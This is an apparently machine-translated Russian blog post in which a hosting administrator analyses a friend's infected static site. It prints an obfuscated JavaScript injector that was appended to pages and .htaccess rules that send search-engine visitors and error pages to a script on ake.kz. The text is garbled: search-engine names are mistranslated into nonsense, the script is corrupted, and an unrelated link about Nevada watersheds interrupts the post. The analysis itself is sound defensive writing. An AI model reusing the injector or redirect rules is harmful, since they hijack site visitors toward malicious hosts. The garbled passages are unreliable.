Жадность, непрофессионализм и киберпреступность на Unix-хостинге • Продвижение Web 2.0

Около трех или четырех лет назад один из наших друзей попросил нас разместить их статический веб-сайт на одном из наших хостинг-провайдеров. Мы не отказали ему, мы предоставили FTP-доступ к его директории, и он сам спокойно обновил свой сайт с помощью FromPage через FTP. Но недавно Яндекс прислал несколько уведомлений о том, что этот сайт заражает его посетителей.

Стал разбираться и сразу обнаружил на сайте два вида заразы. В конце документа сначала идет шелл-код JavaScript.

< s cript >check_content()</ s cript >
< s cript >
c07zf=''yd2c783=/* y430c456 */document;yd2c783.write('<scr'+'ipt>function ya5dc45c4676(y17b43a7){return ev'+c07zf+'al(y17b43a7); }</scr'+'ipt>');  function c074a21767ydb11db(y0613ef7){  var z3f6=''return (ya5dc45c4676('pa'+z3f6+'rseInt')(y0613ef7,16));}function ydad4a13(y79762e){ function y15e305cc(){var y3a7a71c5d=2;return y3a7a71c5d;} var y7974d22a8=''y2b98a4b051='fromCh'y599aa=String[y2b98a4b051+'arCode'];for(y631b173b=0;y631b173b<y79762e.length;y631b173b+=y15e305cc()){ y7974d22a8+=(y599aa(c074a21767ydb11db(y79762e.substr(y631b173b,y15e305cc()))));}return y7974d22a8;} var y00d45bd970=?C7363726970743E69662821'+c07zf+?D796961'+c07zf+?B646F63756D656E742E777269746528756E65736361'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+B7D7661'+c07zf+?D796961'+c07zf+?D747275653B3C2F7363726970743E'yd2c783.write(ydad4a13(y00d45bd970));
</ s cript >

Во-вторых, файлы .htaccess появились почти в каждом каталоге на этом сайте.

find kirovtent.ru/ -name .htaccess|wc -l
       6

Со следующим содержанием

cat kirovtent.ru/www/.htaccess 
ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$  [R=301,L]

Любой, кто знаком с языком mod_rewrite, сразу поймет, что здесь есть правила, которые перенаправляют посетителей от Google. вопросы. Yahoo. стимулировать. альтависта. MSN Нетскейп. аол. Хотбот. идти к. поиск информации. Мама. всесеть. Ликос. искать. метакраулер. запой собачьи какашки. к скрипту на казахстанском сайте

ЧИТАТЬ Как мы поддерживаем здоровье водоразделов Южной Невады

Разбираясь дальше, я наткнулся на перца, который делал им дизайн, потому что только после обновления появились уведомления, очень впечатляющий веб-мастер. Конечно, добиться от него признания вины за установку вредоносного кода на сайт честной компании будет очень сложно, и вам, вероятно, придется просто выкрикивать доступ к нему и разорвать отношения, а пока придется на как минимум получить смену пароля доступа к FTP

Следующие выводы напрашиваются из-за того, что другие сайты на хостинге не модифицировались, а значит, модификация производилась через FTP-доступ. Учетная запись застряла либо у предпринимателя Windows, либо у неудачливого веб-мастера. Или вебмастер подхватил вирус, который находится в директории проекта

Скорее всего, хозяин или этот «кондитер» здесь ни при чем, так как зараза ориентируется на западных посетителей — Яндекс, Рамблер и другие наши поисковые системы в списке правил нет

Видимых признаков порчи хостинга нет, в bash_history ничего подозрительного не обнаружено, хотя никто не смог предотвратить загрузку вредоносного PHP-скрипта, который бы делал бизнес. Остается надеяться на поддержку и время хозяина-хозяина, который, как известно, лечит все, кроме жадности.

Скупость разработки собственного сайта привела к тому, что сайт попал в черный список поисковых систем, и даже FF3.5.2 отказывалась его открывать. Это было очень весело

Source